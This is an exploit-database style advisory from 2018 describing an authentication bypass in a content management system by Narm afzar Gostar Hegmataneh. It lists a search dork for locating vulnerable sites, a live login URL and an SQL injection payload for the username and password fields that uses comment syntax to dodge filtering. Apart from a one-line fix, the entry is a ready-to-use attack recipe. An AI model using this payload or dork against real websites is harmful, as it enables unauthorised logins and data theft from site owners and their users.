[+] Exploit Title ; Narm afzar Gostar Hegmataneh cms Authentication bypass Vulnerability
[+] Date : 2018-07-10
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor HomePage : http://iran.behkima.ir
[+] Dork : intext:"Powered by Arash Zolfaghari © 2014 and improvment by Narm afzar Gostar Hegmataneh"
[+] Version : ...
[+] Tested On : windows 10 - Deepin Os
[+] Contact : https://telegram.me/WebServer
[+] My Site : 0P3N3R .IR
[+] Description :
[!] Narm afzar Gostar Hegmataneh is a personal content management
[+] Poc :
[!] http://iran.behkima.ir/login.php
[!] Username And Password = ' /*!or*/1=1#
[+] Security Level :
[!] High
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] POST
[+] Vulnerability Files :
[!] login.php
[+] Fix :
[!] Restrict user input or replace bad characters
[+] We Are :
[+] 0P3N3R [+] Ebrahim_Vaker